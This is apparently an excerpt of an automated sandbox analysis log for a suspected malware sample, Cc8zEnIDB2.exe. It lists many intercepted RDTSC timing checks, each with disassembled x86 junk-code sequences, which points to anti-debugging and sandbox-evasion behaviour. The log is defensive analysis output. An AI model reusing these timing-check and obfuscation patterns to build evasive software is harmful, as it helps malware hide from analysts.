Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE41F9 second address: CE41FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3B45 second address: CE3B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3B5E second address: CE3B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3E39 second address: CE3E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3E3D second address: CE3E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E8C1FDE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3E58 second address: CE3E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3E5C second address: CE3E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE8h 0x00000007 jmp 00007F43E8C1FDE5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3E8D second address: CE3EB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F43E91C5469h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F43E91C5456h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3EB4 second address: CE3ED5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3ED5 second address: CE3ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3ED9 second address: CE3F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43E8C1FDDFh 0x0000000b jmp 00007F43E8C1FDE4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE3F06 second address: CE3F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5462h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE9A95 second address: CE9AB0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43E8C1FDDFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE8649 second address: CE865E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F43E91C5456h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE865E second address: CE8687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F43E8C1FDD6h 0x0000000c jg 00007F43E8C1FDD6h 0x00000012 je 00007F43E8C1FDD6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b jc 00007F43E8C1FDE2h 0x00000021 jp 00007F43E8C1FDD6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE8A81 second address: CE8A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C551 second address: C9C55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C55E second address: C9C562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C562 second address: C9C568 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C568 second address: C9C5B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43E91C5458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+124816BCh] 0x00000011 mov dword ptr [ebp+122D1BF8h], edx 0x00000017 add eax, ebx 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F43E91C5458h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F43E91C5460h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C5B3 second address: C9C5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F43E8C1FDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C5BD second address: C9C60C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F43E91C5458h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push esi 0x00000026 jo 00007F43E91C5459h 0x0000002c add dh, FFFFFFDEh 0x0000002f pop edi 0x00000030 push 00000004h 0x00000032 xor dx, AC41h 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a ja 00007F43E91C5461h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE8BC8 second address: CE8BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE8BD0 second address: CE8BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE8D31 second address: CE8D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F43E8C1FDD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F43E8C1FDD6h 0x00000012 jmp 00007F43E8C1FDE4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE8D57 second address: CE8D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE8D5B second address: CE8D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE8D61 second address: CE8D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F43E91C5456h 0x0000000e jmp 00007F43E91C545Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CEE626 second address: CEE649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43E8C1FDE8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CED990 second address: CED9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C545Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CED9A6 second address: CED9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CEDAD4 second address: CEDAD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CEDC10 second address: CEDC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CEDF09 second address: CEDF24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5463h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CEDF24 second address: CEDF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CEE0C0 second address: CEE0F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C5465h 0x00000009 jmp 00007F43E91C5468h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CEE0F1 second address: CEE10E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F43E8C1FDDCh 0x0000000e jng 00007F43E8C1FDDEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF49EC second address: CF4A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F43E91C5460h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF56ED second address: CF570F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F43E8C1FDDCh 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007F43E8C1FDDAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF570F second address: CF5734 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F43E91C5468h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF5D4A second address: CF5D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF5D4E second address: CF5D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF5D52 second address: CF5D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF5D60 second address: CF5D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF6023 second address: CF6062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE8h 0x00000007 push esi 0x00000008 jmp 00007F43E8C1FDE6h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F43E8C1FDD6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF6062 second address: CF6066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF6066 second address: CF606A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF606A second address: CF6076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF6076 second address: CF607A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF62FA second address: CF6300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF6300 second address: CF6309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF6309 second address: CF630D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF630D second address: CF6316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF6316 second address: CF6328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C545Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF6328 second address: CF633F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jl 00007F43E8C1FDF6h 0x0000000c jns 00007F43E8C1FDD8h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF6645 second address: CF6659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F43E91C5456h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA6FF second address: CFA70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F43E8C1FDD6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA70E second address: CFA712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA712 second address: CFA723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA723 second address: CFA733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA733 second address: CFA737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF985D second address: CF9861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF9861 second address: CF986D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F43E8C1FDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF986D second address: CF9874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF9874 second address: CF9883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF9883 second address: CF988F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF99F9 second address: CF99FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF99FE second address: CF9A0B instructions: 0x00000000 rdtsc 0x00000002 je 00007F43E91C5458h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF9B4C second address: CF9B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDEh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF9B64 second address: CF9B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CF9D0A second address: CF9D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F43E8C1FDDDh 0x00000016 jp 00007F43E8C1FDDEh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA25F second address: CFA268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA268 second address: CFA27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F43E8C1FDD6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA27D second address: CFA281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA281 second address: CFA291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F43E8C1FDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA291 second address: CFA29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F43E91C5456h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA29B second address: CFA2A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA3E7 second address: CFA423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5468h 0x00000009 pop edx 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007F43E91C5468h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CFA423 second address: CFA427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: D077F5 second address: D077F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: D077F9 second address: D0780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43E8C1FDDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: D05BEA second address: D05C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jno 00007F43E91C5456h 0x0000000c jnp 00007F43E91C5456h 0x00000012 pop esi 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0603C second address: D06044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D06044 second address: D06048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D06048 second address: D0604C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0604C second address: D06052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D061A2 second address: D061DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F43E8C1FDE3h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 jc 00007F43E8C1FDD6h 0x0000001e pop ebx 0x0000001f jnc 00007F43E8C1FDDCh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D061DB second address: D061E5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43E91C545Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D065D4 second address: D065DE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43E8C1FDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
